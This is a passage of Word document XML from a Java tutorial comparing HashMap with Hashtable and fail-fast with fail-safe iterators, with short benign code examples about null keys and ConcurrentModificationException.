          <v:rect id="_x0000_i1460" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF7BCD2" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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de Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2713A985" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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ashMap Example (Allowing Null Key and Value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B1601"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HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1967F12B" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="439BB911"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public class HashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48178EBA"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4ACB4F56"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HashMap&lt;String, String&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF60F1"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null, "No key");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0727016E"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Apple", "Fruit");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6E8072"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0428B0D"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map); // Output: {null=No key, Apple=Fruit}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD5275"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CB1192A"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11F1EBF" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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ashtable Example (No Null Key/Value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EB71F6"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Hashtable;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307FA569" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF98C15"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HashtableExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7FBA6D"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021FB54D"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Hashtable&lt;String, String&gt; table = new Hashtable&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B0C50"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C941B87"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ncommenting the next line will cause a NullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F0D8F1"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table.put(null, "No key"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABF79A7"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EAAEF47"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able.put("Apple", "Fruit");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA8168"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E33747B"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table); // Output: {Apple=Fruit}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47087CB5"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BA5067E"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4F6E856" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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e Hashtable example, trying to insert a null key would result in a NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0DA15" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FD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35DB0017" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For most use cases where thread-safety is not required, and for improved performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9F4F7E" w14:textId="77777777" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00121FDE" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If you need a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>legacy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class, or if you specifically need the built-in synchronization, but this is rarely recommended in modern applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00645A1C" w14:textId="725902D4" w:rsidR="00121FDE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00121FD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E81BDBF">
          <v:rect id="_x0000_i1461" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F1F1EE" w14:textId="366BBFA7" w:rsidR="00E37BCB" w:rsidRPr="00CE4B95" w:rsidRDefault="00E37BCB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc196307619"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Fail</w:t>
      </w:r>
      <w:r w:rsidR="00536F82" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fast and </w:t>
      </w:r>
      <w:r w:rsidR="00536F82" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Fail-Safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> iterator?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w14:paraId="3144A044" w14:textId="5584263D" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">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iterators are used to iterate over collections like lists, sets, and maps. The terms </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fail-fast</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fail-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> describe how iterators behave when a collection is modified while it is being iterated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C52C31" w14:textId="77777777" w:rsidR="0002149E"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219A05">
          <v:rect id="_x0000_i1462" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="173D2553" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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Fail-Fast Iterator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCDAC9C"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fail-fast</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> iterator immediately throws an exception if the collection is modified </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>structurally</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., adding or removing elements) during iteration. This is a safeguard to prevent concurrent modification errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30638CC7" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ow It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If the collection is modified by any thread (or the same thread) while iterating over it, the iterator detects this change and throws a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentModificationException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to signal that the iteration is no longer valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761C794B" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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s of Fail-Fast Iterators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D662BA1" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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p>
    <w:p w14:paraId="13A4A339" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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p>
    <w:p w14:paraId="2E166C1E" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3E8D65" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C33501" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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hen It Happens</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fail-fast behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when the underlying collection is modified (insertion, deletion) after the iterator is created. This is typically detected by comparing the expected modification count (modCount) with the actual count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D554FD" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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 Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2A176C"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D155D6"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Iterator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D6EE27" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377B07DD"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FailFastExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E97DE2"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698EFD59"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rrayList&lt;String&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A2CA7"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list.add("Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAFDD09"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Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBF57FF"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69F8E2E"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terator&lt;String&gt; iterator = list.iterator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E4B8E"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F45866B"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Modifying the list while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794265D9"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Cherry");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034A31C4"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063F076"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This will throw ConcurrentModificationException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CCAEB"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hile (iterator.hasNext()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D16100"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iterator.next());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59832FB7"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8CA5CEB"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65B6A41"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C081303" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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utput</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: ConcurrentModificationException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCE13EE" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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Key Points</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF9A5C" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69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Fail-fast iterators are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05316982" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69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y </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>detect modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while iterating and throw an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A9488A" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69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behavior is designed to prevent bugs due to unexpected modifications during iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050A556" w14:textId="77777777" w:rsidR="0002149E"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1E667D">
          <v:rect id="_x0000_i1463" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E3877E" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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Fail-Safe Iterator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D1CFE7"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fail-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> iterator does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not throw an exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the collection is modified while iterating. Instead, it works on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the collection, meaning changes to the original collection during iteration are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not reflected</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the iterator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6321B6AB" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ow It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When using a fail-safe iterator, the collection itself is not directly modified during iteration. The iterator uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>clone</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copy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the collection, so the original collection can be modified without causing issues in the iteration process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F69B197" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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s of Fail-Safe Iterators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE9DD0" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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pyOnWriteArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7588F1A0" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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pyOnWriteArraySet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AA88C1" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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tHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264D10E2" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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hen It Happens</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Fail-safe iterators work in </w:t>
      </w:r>
